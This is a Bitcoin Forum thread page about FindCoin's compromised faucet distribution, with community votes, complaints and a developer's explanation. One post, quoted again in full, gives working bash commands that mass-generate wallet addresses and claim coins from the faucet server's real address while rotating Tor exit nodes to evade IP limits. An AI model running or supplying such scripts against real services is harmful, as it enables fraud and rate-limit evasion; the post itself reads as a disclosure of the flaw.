Bitcoin Forum
May 02, 2024, 05:35:25 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 [41] 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 ... 93 »
  Print  
Author Topic: [ANN][FIND] FindCoin | Update Wallet If You Haven't! | Community Anti-Scam Token  (Read 126316 times)
This is a self-moderated topic. If you do not want to be moderated by the person who started this topic, create a new topic.
Brah

Activity: 42
Merit: 0

View Profile
January 01, 2015, 04:59:35 PM

I PM'ed most of the devs about a sensitive info leak in the debug.log file on the 27th Dec
https://i.imgur.com/gtkGBMg.png

This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.

Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.

First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal

Code:
/path/to/tor --controlport 9051 &
Next we need a bunch of addresses. Since there is no command line version of the FindCoin wallet this is a bit inconvenient but still trivial to do with one command.
First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Code:
rpcuser=user
rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Then simply send the getnewaddress jsonrpc command to the wallet's rpc port over and over again until you're fed up with it
Code:
 while true;do curl --data-binary '{"jsonrpc":"1.0","id":"curltext","method":"getnewaddress","params":[]}' -H 'content-type:text/plain;' -s http://user:p@127.0.0.1:13333/ | awk -F'"' '{print $4}' >> addresses;done
This will write indefinite amount of addresses until ctrl+c'ed to a file named addresses.

Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
Code:
while read address;do (echo authenticate '""'; echo signal newnym; echo quit) | nc 127.0.0.1 9051;curl --socks5 127.0.0.1:9050 http://104.236.75.141:1532/findcoin/get/$address;sleep 10;done < addresses
And presto you make as many requests to the faucet url as you have addresses over tor, with a new IP between each request. No VMs, no proxies, no extra wallets.

we now can rename this coin to failcoin. byebye people

Yep, yet these skids are pointing their finger towards VPS users when it wasnt it.

http://www.popcrunch.com/wp-content/uploads/2010/12/bowl.jpg

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator
Whoever mines the block which ends up containing your transaction will get its fee.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

Activity: 56
Merit: 0

View Profile
January 01, 2015, 05:05:05 PM

I PM'ed most of the devs about a sensitive info leak in the debug.log file on the 27th Dec
https://i.imgur.com/gtkGBMg.png

This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.

Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.

First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal

Code:
/path/to/tor --controlport 9051 &
Next we need a bunch of addresses. Since there is no command line version of the FindCoin wallet this is a bit inconvenient but still trivial to do with one command.
First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Code:
rpcuser=user
rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Then simply send the getnewaddress jsonrpc command to the wallet's rpc port over and over again until you're fed up with it
Code:
 while true;do curl --data-binary '{"jsonrpc":"1.0","id":"curltext","method":"getnewaddress","params":[]}' -H 'content-type:text/plain;' -s http://user:p@127.0.0.1:13333/ | awk -F'"' '{print $4}' >> addresses;done
This will write indefinite amount of addresses until ctrl+c'ed to a file named addresses.

Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
Code:
while read address;do (echo authenticate '""'; echo signal newnym; echo quit) | nc 127.0.0.1 9051;curl --socks5 127.0.0.1:9050 http://104.236.75.141:1532/findcoin/get/$address;sleep 10;done < addresses
And presto you make as many requests to the faucet url as you have addresses over tor, with a new IP between each request. No VMs, no proxies, no extra wallets.

we now can rename this coin to failcoin. byebye people

Yep, yet these skids are pointing their finger towards VPS users when it wasnt it.

http://www.popcrunch.com/wp-content/uploads/2010/12/bowl.jpg

Yep, ask the dev team how many coins they scammed out of the legal FindYouCoins owners....
Quadmium

Activity: 184
Merit: 100

View Profile
January 01, 2015, 06:11:11 PM

Vote is here: https://bitcointalk.org/index.php?topic=910642
mumak

Activity: 224

here for a while

View Profile
January 01, 2015, 06:12:55 PM

Scammers don't like anti-scam coins and they do anything to kill them. The question is what can be done from here to succeed coin and achieve your goals?

PS. Voted!

I ♥ Crypto!
DenKoma

Activity: 98
Merit: 10

View Profile
January 01, 2015, 06:27:42 PM

Really, really, really great posts here. Want to see who is who overnight = leave thread for 24 hours  Smiley

FindCoin - Anti-scam community-driven coin:
www.findcoin.info
Hollowman338
Legendary

Activity: 1246
Merit: 1000

View Profile
January 01, 2015, 07:00:45 PM

burn the coins
doger69

Activity: 208

View Profile
January 01, 2015, 07:38:54 PM

I must say just burn the coins,who even cares anymore.I was robbed by the process as well as the cheater pieces of sht who used VPNs and other methods.I had 20k coins and now get a whole 6k instead,sorry but its hard to stay very optimistic or positive about it all when I have already been screwed out of 14 k coins.Burn the rest and get the coin on an exchange.
kepo07

Activity: 196

View Profile
January 01, 2015, 07:40:40 PM

agree already vote for burn the funds on faucet
e1ghtSpace
Legendary

Activity: 1526
Merit: 1001

Crypto since 2014

View Profile WWW
January 01, 2015, 08:31:39 PM

Sad No one told me.
uki
Legendary

Activity: 1358

cryptojunk bag holder

View Profile
January 01, 2015, 08:48:52 PM

Now with distribution stopped, how long does it take to process the exchange from old FinYouCoin to FindCoin? Just sent a txid today.

this space is intentionally left blank
DenKoma

Activity: 98

View Profile
January 01, 2015, 09:09:49 PM

Now with distribution stopped, how long does it take to process the exchange from old FinYouCoin to FindCoin? Just sent a txid today.

All pending requests (including today's) have been processed now.

FindCoin - Anti-scam community-driven coin:
www.findcoin.info
uki
Legendary

Activity: 1358

cryptojunk bag holder

View Profile
January 01, 2015, 09:58:30 PM

coins received, thank you.

this space is intentionally left blank
SHNICI

Activity: 434
Merit: 260

View Profile WWW
January 01, 2015, 10:12:42 PM

We do all what's possible for us Wink
We work on all hard to be the community fine, we want to take the best decisions.... but like we know always will have people who are not happy ..., sorry for them, but we can't do everything WE ARE NOT GODs Please ALL decide to stop blame us, we are humans.., but we try to work for the community no just for us (for us like part from the community yes!)
Nthused
Legendary

Activity: 1554
Merit: 1001

View Profile
January 01, 2015, 11:59:44 PM

I have to say this is completely ridiculous, there will always be cheaters and they will dump the minute it gets onto an exchange because its free, the best way to get heaps of FINDcoins is by buying the old FINDyoucoin on c-cex (https://c-cex.com/?p=find-btc) and then exchanging them & start staking, you would have more coins that the cheaters out there.

I was kinda disappointed thinking yesterday I was still receiving FINDcoins to my wallet (Not using the computer) when really I wasn't due to the Faucet being stopped...

I have noticed with the payouts too that the Faucet was stopping heaps and they had to reboot it back up, I was missing hours of payments then they would start up again then oddly miss 1hr Payments sometimes even when the wallet has been open 24/7 since launch.

Maybe PoF doesn't work properly, but when you think of it all the people manipulating the faucet getting heaps of coins (whales) could possible pump the coin and the people who want out can sell before them lol  Shocked

I think I know what is actually happening as before it was decided that the source would be closed there was still Github links so you could download it, then the Dev's decided to do a vote and decided to close it to prevent cheating and take it down, if you were smart enough you would have got the source then gone through it and edited all the stuff for cheating back in.

No matter what the dev's do to stop it the manipulators can edit in what they want to counter it's effect.

Even selecting a certain amount of people and handing them out the coins would still be better than cheating the faucet, e.g Post count/Member rank status/Length of BTCtalk membership, Full member and up, etc

That would stop shillers and scammers if handed out to the right people.

These are just my thoughts and no-one has to agree with them but this is what I think is happening and what should happen.

EDIT: BTW I just found the old FINDyoucoin source that wasn't taken down that people can just change the values to the relaunched FINDcoin...
fenghush

Activity: 658
Merit: 250

View Profile
January 02, 2015, 12:25:23 AM

I have to say this is completely ridiculous, there will always be cheaters and they will dump the minute it gets onto an exchange because its free, the best way to get heaps of FINDcoins is by buying the old FINDyoucoin on c-cex (https://c-cex.com/?p=find-btc) and then exchanging them & start staking, you would have more coins that the cheaters out there.

I was kinda disappointed thinking yesterday I was still receiving FINDcoins to my wallet (Not using the computer) when really I wasn't due to the Faucet being stopped...

I have noticed with the payouts too that the Faucet was stopping heaps and they had to reboot it back up, I was missing hours of payments then they would start up again then oddly miss 1hr Payments sometimes even when the wallet has been open 24/7 since launch.

Maybe PoF doesn't work properly, but when you think of it all the people manipulating the faucet getting heaps of coins (whales) could possible pump the coin and the people who want out can sell before them lol  Shocked

I think I know what is actually happening as before it was decided that the source would be closed there was still Github links so you could download it, then the Dev's decided to do a vote and decided to close it to prevent cheating and take it down, if you were smart enough you would have got the source then gone through it and edited all the stuff for cheating back in.

No matter what the dev's do to stop it the manipulators can edit in what they want to counter it's effect.

Even selecting a certain amount of people and handing them out the coins would still be better than cheating the faucet, e.g Post count/Member rank status/Length of BTCtalk membership, Full member and up, etc

That would stop shillers and scammers if handed out to the right people.

These are just my thoughts and no-one has to agree with them but this is what I think is happening and what should happen.

EDIT: BTW I just found the old FINDyoucoin source that wasn't taken down that people can just change the values to the relaunched FINDcoin...

Thankfully FindCoin is based on the bitcoin source so people can't just edit the source to get coins, that's why we have a blockchain. The POF works by making a HTTP request from the wallet to a remote server which the devs control to let it know what address to send the coins to every few minutes or so. The central faucet server was abused by a botnet due to poor implementation and lack of common sense for security. Keeping the source private has nothing to do with this.

Sarahiko

Activity: 772
Merit: 500

View Profile
January 02, 2015, 01:58:07 AM

Voted for burning of the coin and continue with the PO.
infovortice2013
Legendary

Activity: 1176

View Profile WWW
January 02, 2015, 02:04:31 AM

We work on all hard to be the community fine, we want to take the best decisions.... but like we know always will have people who are not happy ..., sorry for them, but we can't do everything WE ARE NOT GODs Please ALL decide to stop blame us, we are humans.., but we try to work for the community no just for us (for us like part from the community yes!)

making your own miraclecoin?
SHNICI

Activity: 434
Merit: 260

View Profile WWW
January 02, 2015, 02:48:00 AM

making your own miraclecoin?

I will keep my MCL wallet opened..., from the beginning I take it UP 24/7, and will do it.., don't know why.., but people was ask me for nodes ...., I hope.., I trust in some thing and no one can judge me about that..., MCL is different part from FindYou and FIND ! I will folow FIND to the END, cuz I was reborn in the virtual Coin system from the MCL..., and I hope here can do something good, no only take part from the sweet ..., here we can be better in something else..., here we can help to other who need really ...., I will follow the FIND IDEA To the END.., and will NEVER GIVE UP !!!

Take a rest mates, be cool  Cool
hobitcoin

Activity: 101

View Profile
January 02, 2015, 03:24:22 AM

I need to say something here ...

Regarding the events that are flowing and leading to this point at the present time ...

I'm sure ... if something is mean to be ... "It is" ...

Also, I found out (by reading all of the posts here) ...

That ... our FindCoin community has lots of smart, opinionated, strong will and brave people ...

I thank you for becoming part of FindCoin Community ...

I hope that all of the strong and brave people here ...

Will not change their unwavering "Positive" will ...

To become "Hatred" ... and a negative one ...

Instead ... it should be becoming the force of "Good" ...

And making our community "Stronger" as can be ...

Because ... We are "One" ...

And ... We are "Strong" ...
windytime

Activity: 178

View Profile
January 02, 2015, 03:32:14 AM

I need to say something here ...

Regarding the events that are flowing and leading to this point at the present time ...

I'm sure ... if something is mean to be ... "It is" ...

Also, I found out (by reading all of the posts here) ...

That ... our FindCoin community has lots of smart, opinionated, strong will and brave people ...

I thank you for becoming part of FindCoin Community ...

I hope that all of the strong and brave people here ...

Will not change their unwavering "Positive" will ...

To become "Hatred" ... and a negative one ...

Instead ... it should be becoming the force of "Good" ...

And making our community "Stronger" as can be ...

Because ... We are "One" ...

And ... We are "Strong" ...

I wish there was a "like" button on this bitcointalk. Smiley
Every digital coin has its weak point, even for bitcoin. But what makes it strong and get over the storm? It's the belief. If we stand together, we'll be strong and positive.

There are some people who don't believe in anything in their whole life. Poor them. Sometime, believing is a gift. If you don't believe in the way you walk, the person you choose, the time you'll be, you will lose everything. Try to believe, one time, you'll see something you've never seen.

If you want, we can stand by you, and build a strong community!

▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
ZEROSTATEEMOTIONAL INTELLIGENCE                                   ● INSTAGRAMFACEBOOK TWITTER